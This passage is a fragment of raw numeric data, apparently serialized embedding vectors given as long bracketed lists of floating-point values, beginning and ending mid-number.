081,0.0073535014,0.0080343485,-0.022966761,0.015006704,-0.01958355,0.008538586,-0.03276422,0.017793138,-0.015662206,0.014537854,-0.0015803319,-0.015184118,0.0012792408,-0.002853192,0.0025059993,0.0031083638,0.010995836,0.007883033,-0.027624713,0.018072182,-0.002476215,0.014749166,-0.01777565,0.007126335,-0.01860216,0.0003444871,-0.019269459,-0.0065101436,0.013688617,0.001055017,0.011319208,0.030562913,-0.029164214,-0.002354869,0.012762046,0.013230448,-0.004539721,0.008503834,0.01682244,-0.009236387,0.03441324,0.012962549,-0.0039454447,-0.016784579,0.017643759,0.018142518,0.009117537,0.013786746,-0.006474688,-0.0021492543,-0.0011118032,0.0052264202,0.006452862,0.007679821,0.009876584,0.014999806,0.015225978,-0.010795665,0.011227437,-0.0393943,-0.012162083,0.015279642,-0.010736491,-0.008828356,0.01914292,0.02190453,0.00027549104,-0.01601178,-0.004561748,0.0071525387,0.02451386,0.013001303,-0.012913953,0.018937465,0.0061607617,-0.009032048,-0.011589503,-0.006522942,-0.023200111,0.0025442166,0.00572645,-0.00085194927,0.0019214854,0.01028541,-0.031842064,0.0039027364,0.008856892,0.014467481,-0.025083076,-0.013426422,-0.0040145586,0.0031576268,-0.0078716185,0.026719436,-0.010042717,-0.0035295824,0.025184894,-0.015952397,-0.031268753,-0.015771002,0.011127285,-0.02345466,0.006422543,0.0038340036,-0.013636173,-0.0065083127,0.012953033,-0.01627982],[0.0041367365,0.0027938508,-0.011951291,0.00024885044,-0.0136647215,-0.01656477,-0.021677684,0.022900235,-0.011326985,-0.02362811,-0.010831086,0.01644311,-0.0061334143,0.0040112673,-0.015704773,-0.0021744813,0.016967868,-0.010771982,0.006601153,0.0138881495,0.009184988,0.007049293,0.016687673,0.0007634996,0.007827052,-0.004948745,-0.005876973,0.015437686,0.0037587536,0.02520659,0.008159636,0.03693022,0.01714528,-0.018301956,0.0077778134,-0.035559703,-0.020802595,-0.021553325,0.00073820364,0.0046282234,0.010083907,0.015147139,-0.007563216,-0.0022274489,0.006054245,0.0022167526,-0.0072442116,0.01411232,-0.03208536,-0.00071036,0.021769114,0.00425311,-0.03005391,0.000613903,-0.011964856,0.0045120446,-0.002738098,-0.020272186,0.012392363,0.0035259791,-0.011388941,0.009333347,-0.024606504,-0.0145711675,0.005616078,-0.01086254,-0.017904956,-0.007544422,-0.00074411393,-0.031854536,-0.021652637,0.005103923,0.011702022,-0.0043906067,0.0008731157,0.01845096,0.023703208,-0.009017235,-0.0077967276,0.009194975,0.0037180292,0.02694245,-0.042881716,-0.0010965843,-0.0039481274,0.0021949653,-0.025496522,-0.012334149,-0.0121081015,-0.030957874,-0.031479906,0.010926837,0.012453243,0.023241105,-0.021796009,0.02198264,0.013396705,0.00043439714,0.017384645,0.030046517,-0.01689865,0.004566141,-0.027277704,0.0070882016,0.013603957,-0.012750449,0.008946842,-0.010710372,-0.013012203,0.0111105535,-0.00016158138,0.004686223,0.005061613,0.007907441,0.014775061,-0.038147204,-0.003922283,0.01425606,-0.017879277,-0.0007906512,-0.013732259,0.027212134,0.024858383,0.011966971,-0.013463291,0.0043851505,-0.0174911,0.009504522,0.0015145995,0.007003852,-0.012398254,0.0029086478,-0.0028999478,-0.014257349,-0.014861001,-0.0034002864,-0.00055481517,-0.009540339,-0.00036539396,-0.006707269,0.004373028,-0.02283513,-0.015493576,0.010037199,0.012667199,0.016058134,0.004195824,0.028370963,0.007066043,-0.0011773651,-0.010304917,0.0089849755,-0.003781871,-0.0072605624,0.007694215,0.025869148,0.026292967,-0.010696491,-0.041740727,0.0055634375,-0.030962009,0.026566952,0.0036558178,-0.017074766,-0.0028773404,-0.012861917,0.015947396,-0.0068912804,0.0048365835,0.014164786,-0.001621477,0.024759596,-0.0016508981,-0.0039963806,0.0026771056,0.017151223,-0.0065756277,-0.023315053,0.01152985,0.00030460983,0.016657505,-0.006889206,-0.0022948566,0.007822895,-0.000016521442,-0.00029595,0.02858162,-0.005733115,-0.00976962,-0.015138129,0.02394904,-0.011710039,-0.010123231,-0.011313227,-0.008937251,-0.003987639,-0.0016243146,0.071027465,0.011671922,0.020035254,-0.011705562,0.009203336,-0.0062536704,-0.021764945,-0.023995863,-0.014983872,-0.014238964,-0.017335732,-0.0032823537,-0.005879373,0.0025302449,-0.0020394202,0.0034002606,0.00110586,0.011180241,-0.06040402,0.024406936,0.019704299,0.02320416,-0.004094976,0.0036995455,0.011792505,0.03216729,-0.022098497,-0.010926782,-0.04135869,-0.008648659,0.0014665149,0.004157682,-0.025872536,0.0118870465,0.0058048614,-0.020201927,0.013830333,-0.0038044336,-0.020364208,-0.012324669,0.0070863385,0.017531907,0.0013575301,0.001761419,0.007455283,0.032217395,0.042912025,-0.019909985,-0.004678214,0.00841566,0.020119801,-0.015942184,0.028423598,0.020845352,-0.020428734,0.034736592,-0.013591493,0.0024517307,-0.014100003,-0.015875436,-0.015249203,0.009082566,-0.0025445216,0.015668422,0.019545997,-0.004722847,0.02164222,0.039127026,0.0027798368,0.0066987486,-0.027768513,0.0002836939,-0.03446651,-0.014459201,-0.016430315,-0.016011873,-0.004523056,0.01513602,-0.0036919562,-0.008335842,0.029110678,-0.013677651,-0.020455953,-0.00087521493,-0.01487001,-0.0016247269,-0.011027894,-0.003182341,0.0042809634,-0.004876255,-0.008348985,0.026296394,-0.012144751,0.0021670891,-0.019782001,0.00083585473,0.010620819,-0.0048681614,-0.018564658,-0.015391209,-0.0026301488,-0.0009138214,-0.03251442,0.0023209632,-0.013472392,0.0399207,0.009479234,-0.02102837,-0.0041814907,0.00043202945,0.04225332,-0.022179918,0.006885385,-0.012536847,-0.0056374352,-0.013341247,-0.021821119,0.006678848,-0.0055553587,-0.0012085427,-0.0075626485,0.0028997185,0.016690275,0.0024732628,-0.010688125,-0.01755186,-0.019877594,-0.019626401,0.00023308798,0.010236391,-0.0007112291,-0.0017557153,0.003299281,0.019680634,0.016747894,0.0068762274,0.012100902,-0.017631775,0.03965713,-0.013148344,0.008987556,0.005923585,0.006516676,-0.03022945,-0.013156661,-0.01171,0.015022521,0.00067155214,-0.03796195,-0.0012659283,-0.01718373,0.01798162,-0.0074224463,-0.00094627484,0.006007055,0.012996783,-0.017133217,-0.0065278653,0.01218057,-0.012422457,-0.0058985325,0.013183234,-0.016773157,0.021087883,0.016197953,-0.015810987,0.0007455994,0.06734555,-0.004118645,-0.0034369892,-0.0005039173,-0.033646427,0.00403871,0.0092893895,0.0007754396,0.003461656,-0.0062316377,-0.025991771,-0.014275916,0.015397106,0.009345067,-0.01731936,0.009424693,-0.012637099,0.0042602937,-0.015182785,-0.005230878,0.0022111419,-0.0017453824,0.0031490498,0.04059445,0.008953854,0.010822349,-0.014948005,-0.018909307,0.01944668,-0.011793192,-0.0048225285,-0.012721101,0.008064223,0.008342857,-0.03800147,0.009374619,0.01064852,-0.0076792007,0.006963279,-0.018660001,-0.0015652786,0.0066140075,-0.0030516011,-0.029453928,-0.016559878,0.010691103,-0.0062929504,-0.014946295,-0.011890195,-0.004744075,-0.023587057,0.022170104,-0.020602431,0.014816163,0.0008741404,0.029712005,0.02326266,-0.028521419,0.024044687,0.017244153,0.007346912,-0.00427887,-0.0039483695,0.0028250522,-0.0033648077,0.031881552,-0.015420484,-0.0076280064,-0.0016625718,-0.008759039,-0.014710931,-0.007624842,-0.005165234,0.009626348,0.0074217464,0.025828063,-0.0047686766,0.010727595,-0.011882347,0.0023477522,-0.0003459724,0.010572771,0.019277371,-0.00061149336,-0.0048973355,-0.024962304,0.0067384974,0.015160843,-0.008407332,-0.01649215,0.0062474413,0.038169276,0.03171591,0.0021116813,0.014028237,0.02619692,0.023550645,0.013907286,-0.009287467,0.010419371,0.00879582,-0.030301122,-0.017015956,-0.014500577,0.016130384,-0.00228193,-0.019146523,-0.027901426,0.005563076,0.02533271,-0.020272102,0.0005911474,0.010735668,-0.018397229,0.00078687974,-0.00859369,-0.02596243,-0.004228023,0.0019743263,-0.0075975074,0.023921981,0.011702025,-0.0071757166,0.004187338,-0.024400182,0.011414448,-0.0011197857,-0.014043728,-0.008942765,0.03913311,0.005930235,0.014031444,0.014595974,-0.028536698,0.014203733,-0.009970129,-0.0052032024,-0.03737125,0.001009398,0.0054944423,0.01249437,-0.0064617894,0.047468193,-0.010200635,0.013339492,0.0118895285,0.033483524,0.0016636578,-0.029624032,-0.0009704552,-0.002762283,-0.0026727773,-0.022154003,-0.02178494,0.0071976054,0.0023412488,0.023527866,-0.017106624,-0.0011979981,0.037543543,0.0070855166,-0.006658718,0.00045150754,0.025032517,0.002180963,0.008797779,0.021971239,0.016886275,-0.023557194,-0.012792272,-0.00805289,-0.016764091,0.017801559,-0.000913535,0.0043084533,-0.037905827,0.0010843884,0.010145993,0.020490604,0.0141069,0.016609268,-0.024983766,-0.014687648,0.0052645067,-0.0110177705,-0.028700745,-0.00056697585,0.0028584267,-0.025057899,-0.012063681,-0.034956846,-0.016744046,-0.0046694884,0.015370971,0.005118366,-0.014316209,-0.0010131624,-0.017569406,-0.01988425,0.0058543496,-0.008015045,0.012572482,0.011657815,0.021637,-0.0015361944,0.0023183546,0.033861816,-0.0033084478,-0.013858546,0.005039882,0.015453937,0.0011637129,-0.005933688,0.01968358,-0.0012327777,0.020423992,-0.006056854,-0.0050170072,0.026748193,0.022565762,0.013668247,-0.005416647,0.010991247,-0.0036860744,0.0033594642,-0.012413264,0.016360292,-0.010572457,-0.014252845,-0.03868738,-0.016744973,0.009733976,0.0063573094,-0.014936112,0.004175329,-0.019883439,-0.018992463,-0.015396839,-0.002091369,-0.0062626554,-0.006665932,0.008571652,-0.0029393723,-0.016852006,0.012050253,0.010913026,-0.012262118,0.012212818,0.015332599,0.0049879653,0.007854042,0.017548312,-0.0214177,-0.008506097,-0.012352396,-0.005831541,-0.014714297,-0.0057531707,-0.021990884,-0.010655461,-0.0076103318,0.009028693,-0.006075854,0.002044336,-0.005076449,-0.014448289,0.007806513,-0.031502474,-0.011706311,-0.014821668,0.016197864,-0.014704062,-0.02205106,0.0150754955,0.02197132,0.0060031493,-0.013877023,0.0060468693,-0.06341777,-0.014333531,-0.009613539,0.01829868,0.0042469446,0.052509982,0.030069718,0.007318689,0.0112425275,0.00087247294,-0.010564439,-0.010517838,-0.00052073476,0.0078051444,-0.0028052486,0.0024805693,-0.021274395,-0.025318576,-0.018522589,-0.01737569,-0.035378423,0.0518829,0.000058186473,0.00038297666,-0.009378607,-0.017725917,-0.026992528,-0.004457053,-0.009640601,-0.038244907,-0.005449328,0.01764891,-0.013391324,0.025769088,-0.017665582,-0.012789211,-0.009577713,0.0133099845,-0.02421665,0.006853459,-0.0040275576,-0.01400808,-0.009429908,0.028345445,-0.02728722,0.044682637,-0.028403604,0.021165334,0.0052939127,0.016517075,-0.00027914337,0.007080025,-0.0075868033,0.009119191,-0.022734297,0.025107514,0.00851985,0.0094850715,0.015074903,0.0073411227,0.0090707345,0.0072760945,-0.022201277,-0.017173072,0.012381737,0.013634434,0.0102631375,0.010219715,0.039965384,0.019676194,0.0262198,0.025677128,0.01849367,-0.002806198,0.007517805,0.0036152222,0.018881587,0.02234883,-0.007282946,0.010442549,-0.031101305,-0.02029991,-0.016795117,0.018521015,0.012871358,0.02227761,0.010438254,0.011250728,0.0065269894,0.027276082,-0.006742375,0.0011056648,-0.006486268,-0.009801313,-0.0198244,-0.016247647,-0.017712623,-0.027589949,-0.017354175,-0.003072509,0.02081464,-0.009603406,0.008631254,-0.04153547,-0.0013384193,0.0113787325,-0.036235675,-0.009338551,0.005515276,0.017989464,0.0029245582,0.0038104984,0.013931368,0.03457242,0.016771164,0.023403002,-0.022631446,-0.006903722,-0.008781124,-0.008485642,0.010709062,-0.021355776,0.023525577,-0.008013091,-0.026429193,-0.00026580325,-0.021214046,0.0026344128,0.003534334,0.0077957064,0.015336078,-0.01971882,-0.0098440815,0.007330797,-0.027770177,-0.0071356455,-0.015468031,-0.018844625,-0.004813625,0.00028859972,-0.0035641,-0.026900718,0.013658921,-0.021339007,0.038949624,0.041895207,-0.0010512937,0.007272332,-0.022024373,0.0075785317,0.028142327,0.012633997,0.008673103,-0.025364138,-0.002912244,0.0020669212,-0.019235764,-0.010333902,-0.008055816,-0.0023015945,-0.020280628,-0.033517197,0.000337898,-0.04079708,-0.003661031,-0.004074861,-0.012415874,0.024104284,-0.01957354,0.026396472,-0.0045772046,-0.0023331877,0.009173174,-0.025031677,-0.0057763387,-0.030883064,-0.025635155,0.02146387,-0.020258687,0.0033586305,-0.0060070693,-0.0108912,-0.024066526,-0.03536723,0.009617286,-0.011732766,0.024278909,-0.004779415,0.0054165865,0.00465824,0.027160175,-0.028833289,0.011343939,-0.019873051,-0.011582107,0.00011500749,0.0024575065,-0.0068844976,0.009518973,-0.013973296,0.009736743,0.028972575,-0.029530738,0.034948383,0.011681809,0.01732636,0.00028228786,0.0055754064,0.006382453,0.004657071,0.010615267,-0.00080248597,0.000909027,0.015641818,-0.008982601,0.018790497,-0.008209575,-0.025505356,-0.023720512,0.0030000836,0.0061579426,-0.003831443,0.022192845,0.012045596,0.0073934733,-0.0030045714,-0.01498378,0.016202135,-0.011447031,0.01940564,0.008421429,-0.006826963,-0.032343928,-0.01921261,-0.0024313282,-0.019454999,-0.007922607,0.025053563,-0.01657464,0.002780069,0.021174712,-0.009624429,-0.006974523,0.011677247,-0.007960946,0.010167789,0.01763209,0.018891692,0.00606702,0.0062956843,0.015196599,-0.025935225,-0.007029767,-0.013598698,-0.018986033,0.023419613,-0.015126055,-0.012901472,-0.013137258,-0.00006796248,0.0022010019,-0.021195518,-0.013194105,-0.013742385,0.02699478,-0.010731668,0.029394817,0.0102738915,0.005565043,-0.009526012,0.010806142,-0.0026915579,0.013712678,-0.00028151902,0.00833423,-0.0021397823,0.0073455744,0.002475343,0.017155882,-0.0031162438,-0.021498818,0.023095507,0.015864823,-0.013346357,0.019625716,-0.006464108,-0.0040683174,-0.0045860647,0.017942788,-0.026869636,-0.0063082078,0.0024311524,0.022271879,-0.006538965,-0.019342309,-0.02115299,-0.08215,0.023934815,-0.025361216,-0.006924915,0.024463862,0.013272589,0.015250944,-0.007429403,0.034220092,-0.03553659,0.01050456,-0.007436954,0.016554983,-0.012938006,0.009382467,-0.011944428,-0.008553656,-0.025479794,0.020169444,0.008070879,-0.011052548,-0.007736526,0.0021361674,-0.001840416,0.049518097,-0.007009836,-0.015255745,-0.0047931285,-0.024563313,-0.0012591503,0.006767522,-0.0010435273,-0.0002651591,-0.016107464,-0.003472043,-0.0048984005,0.020515738,0.0054575736,-0.013447836,-0.021737382,0.0008583066,-0.005330951,0.019103667,0.026756339,0.0028414782,-0.026672192,0.030694813,-0.0041901357,-0.0023801716,0.008353313,0.0102561675,-0.005050594,-0.009023826,0.019543458,-0.02699408,0.023929657,-0.0076551153,0.00834241,0.0051613855,-0.0057720672,0.0023473268,-0.019253764,0.01800363,0.02712638,-0.03345427,-0.020959957,0.0014874716,0.03477204,-0.011006631,-0.005833833,0.006497985,0.0017920356,-0.009021262,-0.011172042,-0.030581819,0.016433377,-0.015304104,-0.0045841797,0.0015568095,-0.006911291,-0.0017283758,0.02623886,-0.0068084877,-0.009316166,-0.022777895,-0.015501491,0.016498912,0.0099762045,-0.0022820968,0.002939858,0.007806275,-0.008746299,0.01322614,0.026760126,-0.00720332,0.028221173,0.020729898,-0.0033920554,0.0051298295,-0.0005605576,0.009691982,0.0008207256,-0.0036103146,0.035172153,0.012829033,0.0016637237,0.0051683066,0.0029789614,0.024370912,0.031220153,0.0017985144,-0.002910921,-0.010701135,0.01221463,0.01604325,0.000049386446,-0.016212085,0.018807791,0.023606995,0.035951518,0.004615018,-0.030200822,0.016478635,-0.005643825,0.0060197567,0.00003088903,0.0005861898,0.0013946922,0.000011198976,-0.026396086,0.004066261,0.0010429774,-0.012855021,0.0126154665,0.011045345,-0.011949616,-0.0029118094,-0.010747157,0.0019432115,-0.029939,-0.003164516,-0.012326797,0.0033720287,-0.00066700747,0.0060553714,-0.02013742,-0.006255106,-0.013549543,0.019945452,0.0017435213,-0.0010624763,0.007861465,0.011288197,-0.000891581,0.011670461,-0.018034507,-0.0045952005,-0.030496215,0.018857243,-0.013589468,-0.009001676,-0.0146263335,0.010826778,0.0149531495,-0.030400282,0.016473597,-0.0152925,-0.02096834,-0.014549088,-0.014499367,0.003819368,0.012916311,-0.022124356,0.035231628,-0.012810456,-0.02540296,0.025769914,-0.009029575,-0.008048017,0.023124559,0.00583959,0.024503428,0.010298744,0.0014914038,0.006032063,-0.0109677175,-0.029488266,-0.012305579,-0.015450452,-0.016350703,-0.014836339,-0.01904715,0.012676871,-0.004864704,-0.02111469,0.04758206,-0.012516508,0.021953074,0.0128243705,-0.009203238,0.0045780228,0.013322556,-0.0013922142,0.0029949443,-0.023028215,0.036645982,0.0006713773,-0.035124607,0.0035758219,0.005171506,-0.017521994,-0.018742291,-0.008802458,-0.0023430213,-0.023061724,-0.014014604,-0.02251578,0.0047336644,0.017961107,-0.03611762,-0.007015034,0.039503936,0.007581767,-0.0015750728,-0.013286722,-0.008701604,0.0029370873,0.022617048,-0.00045302536,-0.006565987,0.016959127,-0.009554542,0.009360592,0.026320823,-0.026118284,-0.033196095,0.005870715,0.01845613,-0.016098412,-0.008826245,-0.004114485,0.007164832,0.011726454,-0.008599597,-0.019102562,0.005494681,0.010048766,-0.01666746,0.012172103,0.024029722,0.010187128,0.00691455,0.0037055763,-0.021149987,0.0061221104,0.0066675018,-0.006237435,0.0018847118,-0.0017434383,-0.01859446,0.0019260634,0.00077172456,-0.010312171,-0.020942109,-0.019462744,-0.0073378254,0.005047241,-0.002062862,0.039211083,-0.0045853867,-0.0042605423,-0.0030478376,-0.0014131222,0.007266872,-0.000904105,0.013274831,-0.019019444,-0.031950206,0.0008590338,0.0081936475,-0.014054394,0.010897469,-0.010018926,-0.025735661,0.013216577,0.022752898,0.0019512338,-0.011669943,-0.00603988,0.00078842597,-0.015936377,-0.021179281,0.0076325494,-0.011199801,0.006606848,0.0043909177,-0.012621507,0.00950582,-0.003240838,-0.0019947449,0.0813381,-0.017507428,0.016254788,0.013312611,0.012992395,-0.029040122,0.022764206,0.0129066855,0.005344645,-0.0012691615,-0.026824733,-0.011274819,-0.017461522,0.007868348,0.01736101,-0.02378344,-0.020290725,0.023223018,0.026358282,0.0051513826,-0.004091323,0.012617225,0.008693895,-0.0076983017,0.012922102,0.019338474,0.009840345,-0.012062797,0.011684724,0.025527688,-0.00029526197,-0.024879793,0.02263886,0.01603563,-0.035621304,-0.0061929296,0.0037690578,-0.0013165883,0.015463671,0.013945789,-0.0075135324,-0.02149666,0.03683871,0.007118092,0.017260956,-0.012319613,-0.008863938,0.00862993,-0.01972828,0.010123416,-0.000847017,0.0036008023,0.0012289628,-0.004656246,-0.005572852,-0.015425053,-0.012613936,0.026006479,0.006506028,-0.011980158,-0.0017284108,0.029993318,-0.0005281885,-0.032628294,-0.017219711,0.011118785,-0.0101813525,0.002478371,0.018868297,-0.030403882,0.0029885524,0.0077503957,0.012050113,0.029689813,-0.024735946,0.011897593,0.00472325,-0.006633776,-0.011261289,-0.0060656737,-0.027486268,0.0036242916,0.027505511,0.00709564,-0.008504568,0.007531355,0.016799483,0.0076639857,0.024842346,-0.0033049982,0.014398469,0.007223752,0.016293712,0.002550572,0.014790001,0.018240836,-0.014240855,0.0040206364,-0.02316467,0.029235214,0.013710043,0.004327639,0.008258358,-0.016530082,0.0112241525,-0.016112817,0.018221503,-0.028461384,-0.013021518,0.0405624,-0.0043477407,0.005265214,0.015117702,-0.005389517,0.017676657,-0.019747341,0.0037074222,-0.01068789,0.0050745276,-0.020213047,0.005088333,-0.008321441,-0.007494366,-0.05756937,0.0019581197,0.109839916,-0.010595894,-0.0036013133,-0.0019983577,0.0029373246,-0.0061758156,-0.15658435,-0.0055714943,-0.014215451,0.021662977,-0.0024139923,-0.010016142,-0.009887938,-0.0027015873,0.010701167,-0.010504031,-0.0009781296,-0.020879129,0.014904705,-0.017044265,0.0011731222,0.016850336,0.007198545,0.01603827,-0.01820684,-0.015500487,0.01638862,-0.0140115535,0.008159972,-0.011658464,0.0024718377,0.0127836075,0.008333784,-0.014613994,-0.020847635,-0.0021606956,0.012969458,-0.008571464,-0.027732573,-0.02358801,0.02873745,0.0067628874,-0.002834561,-0.037095495,-0.10568374,0.008869327,0.004749351,-0.03604396,0.026256708,-0.019462531,-0.014788413,0.014208444,0.016255256,-0.01419893,0.015017922,0.029586809,-0.020024102,-0.0076993178,-0.030905144,-0.008642333,0.008050884,0.0067173583,0.0061608003,-0.005216759,-0.013358447,-0.018140115,-0.044906672,-0.0022282747,0.0070180926,0.022931395,-0.00084784674,0.0053303265,0.03087908,-0.0019996227,-0.022127276,0.009870722,-0.024220023,0.0010863418,-0.023269523,0.002458133,0.013741635,0.016474936,0.0020808827,0.020386862,0.02040891,0.002488031,-0.021657245,-0.0036594286,-0.0014149405,0.021044966,0.0015790618,-0.006557175,0.023460444,-0.004409993,-0.016951451,-0.009573549,-0.007146539,0.019185057,-0.0034969589,-0.0000023924845,0.00007458431,-0.030137813,0.005682915,0.0013115715,-0.00051228405,-0.00143973,-0.00355989,0.00975403,0.04251629,-0.0036067588,0.0030450637,-0.016572766,0.008396318,-0.0013064421,0.008178859,0.00847174,0.007347804,-0.0021875189,0.005073235,0.007838947,0.0032624775,-0.004978433,-0.0030699468,-0.023852667,0.019079568,-0.015576542,-0.010744439,-0.03099666,0.02178458,-0.0131341005,0.0022265075,0.027735092,0.0035506312,0.012492657,0.022968968,0.00698595,0.0058954903,-0.019330483,0.03887527,0.008477676,0.014328222,-0.02129699,-0.029450545,0.03067602,0.009907883,-0.02330466,-0.021256302,0.014925915,-0.03211943,-0.0030929528,0.002275395,-0.0064905747,-0.026383722,0.010937464,-0.0076303813,0.00055242056,0.036192212,-0.021325625,-0.015812082,-0.005662358,-0.0033889778,0.00835352,-0.0013822445,-0.047996584,-0.019186268,-0.0014572137,-0.020109821,-0.0028414829,-0.0027721897,-0.014250868,-0.01868457,0.0057949526,-0.033802636,0.018058257,-0.014769294,0.0064841565,-0.0030914703,-0.016569076,-0.0061906693,-0.01546745,-0.015193243,0.017591866,-0.0437798,0.000628035,-0.010436919,0.0050797365,-0.00084851374,-0.001033712,0.0013346648,-0.019105935,0.012792961,-0.01763968,0.024376411,0.017265232,0.009039935,0.02955257,-0.008087827,0.015961086,0.018021295,0.04593208,-0.025335394,-0.02614009,0.014944135,0.034438167,-0.002238834,-0.00038489528,-0.012499717,-0.030586269,0.0020594604,-0.010123242,0.001946944,-0.0014959614,0.016890503,-0.02557799,-0.017750025,0.016127065,0.02405758,0.004452358,0.012979558,-0.0031471706,0.0038245856,-0.00203727,0.021233354,0.015259413,0.016833661,0.006276126,0.0029551715,-0.0019716974,0.006929157,0.0039781583,-0.009407634,0.009155814,-0.013496343,0.015982363,-0.03335917,-0.024906551,-0.012055224,-0.007372884,0.004214248,0.0005222142,-0.0038428237,0.014168483,-0.018947717,0.008819385,-0.0109110195,0.009555405,0.022219308,-0.00048427394,0.006368927,0.009853362,0.0066454033,0.017332109,-0.021419866,0.005739519,0.00037569812,0.0003347408,0.0030064739,-0.027277123,-0.03165244,0.008737079,-0.008685742,-0.021071065,0.002195472,-0.01785187,0.0018047381,0.0084305275,0.00595828,-0.0068149655,0.024187377,0.008870115,-0.0036522793,-0.025384335,0.0114013925,0.013921494,-0.007066259,-0.034045935,-0.0071415007,-0.025294857,-0.01029252,0.015825396,0.04084192,0.011608098,-0.0043221586,0.0031000366,-0.00799178,-0.012729918,0.028321449,-0.0026536076,-0.015371627,0.0026020124,0.017478071,0.046609037,0.005635757,0.0003518269,0.00713277,0.0066812043,-0.0009434343,0.00922299,-0.0013701188,0.018247867,0.022547046,-0.0009950474,0.020806007,0.016648453,0.0022746369,0.021069974,0.018848317,0.0021805493,0.0013837519,-0.012414906,-0.0014403149,0.0029391204,-0.041698337,-0.014546161,0.04176324,-0.011746888,0.00372493,0.024981957,0.0006693581,-0.015494426,-0.0034006583,-0.004949674,-0.024051,0.008673714,0.0055252425,0.01059335,0.006265485,-0.048046615,0.029681934,-0.015419483,0.023277016,0.018926257,-0.011985235,0.009843367,0.021349523,0.03646143,0.014781479,0.017755155,0.0046159364,-0.014962175,-0.019322952,0.014656546,0.020261386,-0.020030528,0.0061763627,0.0040403786,-0.019349433,-0.022198893,0.023235852,-0.007905245,0.01875736,0.006883341,-0.0014071218,0.00936608,0.007292035,-0.0051305057,-0.011731656,-0.029670537,-0.00947814,-0.024129456,0.031381495,-0.010891306,0.0009116155,-0.03351726,0.0074558267,0.04011889,-0.008476543,0.030658254,0.004966954,0.019564731,-0.01224386,-0.023234716,0.0008781352,0.0016398041,-0.018695235,0.021937668,0.018391322,-0.0172483,-0.039569207,0.008945105,0.0063989977,0.012691464,-0.0045285323,0.0122032715,0.032084703,-0.005892555,0.04452654,-0.024406122,-0.012097037,-0.0004813795,-0.00023904975,-0.008140184,-0.026841901,-0.038846087,-0.021197269,0.0016474534,-0.013890698,0.004273165,0.006905564,0.02372499,0.011057383,-0.021591857,-0.0061866916,0.012244904,-0.0070370683,0.009853476,-0.03966723,-0.0026689544,-0.0069269226,-0.015759913,-0.008959876,-0.040801104,0.015432346,-0.0023379703,0.0007370464,-0.011744936,0.014448962,0.023674319,-0.029012334,-0.017389933,-0.0002591053,0.0031435932,0.018050527,-0.0067193955,0.0036795547,0.0032570248,0.025895324,-0.020575477,0.0027068693,0.003730106,0.02373149,0.034265965,-0.0026353432,0.011182131,-0.0102997925,-0.01780813,-0.010096463,-0.029672265,-0.012614484,-0.0046182526,-0.029526109,-0.011480751,-0.00059164176,-0.0025857266,-0.016628064,0.014556651,0.00808144,0.021302277,0.0075270715,0.022479754,-0.017097188,-0.029946145,0.013055382,0.016240288,-0.00021827256,0.008843042,0.0035821868,-0.024121776,-0.0363811,-0.018195864,-0.011893426,-0.010730674,0.008633121,0.012793197,0.025811037,0.012495363,0.029332798,0.01020932,-0.009104003,0.010588963,-0.012432728,-0.016981248,-0.007366081,-0.00047438216,-0.014205469,-0.0057903565,-0.038515147,0.011884332,0.012433324,0.03885325,-0.0200492,0.016378678,0.013228151,-0.023868015,0.0014547915,0.012904763,0.030336069,-0.012232723,-0.043316007,-0.011727933,-0.014568553,-0.00728875,-0.020519929,-0.03645619,-0.009697924,0.00017612695,-0.004279628,0.004250347,0.0029278903,0.008059114,-0.003996793,0.022942362,0.029680246,0.004943587,-0.017047353,0.01275277,0.013451088,0.0018578436,0.0022210958,-0.008658324,0.007878574,0.007747903,-0.013708436,0.01543358,-0.0047295983,-0.006141752,0.03551952,-0.0052832956,0.019149376,0.011781526,0.0030071212,-0.0017175914,-0.011879143,-0.011824107,0.0021925506,-0.03784583,0.00036148838,-0.010348944,-0.006381333,-0.0017663534,-0.030717159,0.005937645,-0.17909451,0.00061634835,-0.016949162,-0.008468747,-0.0010554426,-0.015639894,0.013805881,-0.0015729296,0.018641729,0.014372829,-0.005153055,0.025507255,-0.00064424967,0.017089544,0.037086602,0.00057079457,-0.03165801,-0.0062667187,-0.02812384,0.0003126032,-0.0024457637,-0.016355442,-0.0013061359,-0.0028335568,0.019503592,-0.002258799,0.0002835758,0.0063289916,0.0020854643,0.0025429712,0.0011929219,0.03315223,0.007402283,-0.000005899973,0.0079656,0.026244454,-0.015352511,0.0035719066,-0.0021466226,0.029833715,-0.014942695,-0.006262921,-0.01715364,0.0063641756,0.008721306,-0.022951204,0.027510814,0.012153285,0.02430479,0.012926266,-0.0051030153,0.0049698018,0.00664514,0.0035316846,-0.020049864,0.0058433725,-0.008651789,0.0075711794,0.022169244,-0.008984915,-0.0035857284,-0.014912271,-0.0044496,-0.0038996902,0.004167808,-0.0051732427,-0.007274054,0.02088192,-0.009242082,-0.02163453,0.014313019,0.009443679,-0.0058697374,0.00551238,-0.006936195,0.0051073534,0.023971662,0.0013084976,-0.01373931,0.037761897,-0.020527827,0.009266066,0.015026058,0.02520168,0.004252526,-0.013378336,0.01735166,0.011963585,0.0027529576,0.008014412,-0.0023748397,-0.0010382276,0.001600295,-0.01992817,-0.006299712,0.009817029,-0.009815732,0.013049457,-0.02170421,0.0030606808,-0.012134715,-0.015060145,0.0032967818,-0.01780709,-0.1306765,-0.019002382,0.0044326563,0.015318757,-0.005198687,-0.030108087,0.006614468,0.0010211037,0.020071419,0.017689345,0.005688284,0.0023200174,0.0058734957,0.008975598,0.014675167,-0.0031707685,-0.030576268,0.035321344,-0.0045591923,-0.02266683,0.011372095,-0.013371873,-0.017003817,0.026853133,-0.0069166264,-0.0007570807,0.0053100097,0.03758588,0.016368302,0.014454171,0.0019776651,0.014742794,-0.0039127246,-0.022868695,-0.054760996,-0.016137926,0.021469882,0.001006439,-0.0045649987,0.039713066,-0.005111296,-0.027814053,0.01391973,0.015036255,0.008234135,-0.030001452,0.00998909,0.021064755,0.00045136968,-0.033197563,-0.012560872,0.0061121685,-0.0006621266,-0.009618975,-0.0017133027,-0.0050563514,0.003292093,-0.004509149,0.027863137,-0.000854098,0.0058702556,0.008885409,0.0007870569,-0.008687117,0.02651054,0.020857887,-0.008920262,0.02418953,0.0061017186,0.0234548,0.016104713,0.03180911,-0.003783247,-0.023774596,0.031922013,0.002225482,0.014251856,0.018058306,0.01293972,-0.015646629,0.007549544,-0.01982988,-0.000628004,0.019086288,-0.03766242,0.0017655075,0.007115774,-0.022450553,-0.037120543,0.004997675,0.035846133,0.020389235,-0.008309063,0.027604675,-0.004177938,-0.007852751,0.014853623,0.0126853315,-0.01122465,-0.007792075,-0.004329632,-0.0077260574,-0.00014194172,0.0032055029,-0.000044221924,-0.0066090175,0.02173051,-0.015980948,-0.0077041304,-0.00081980723,-0.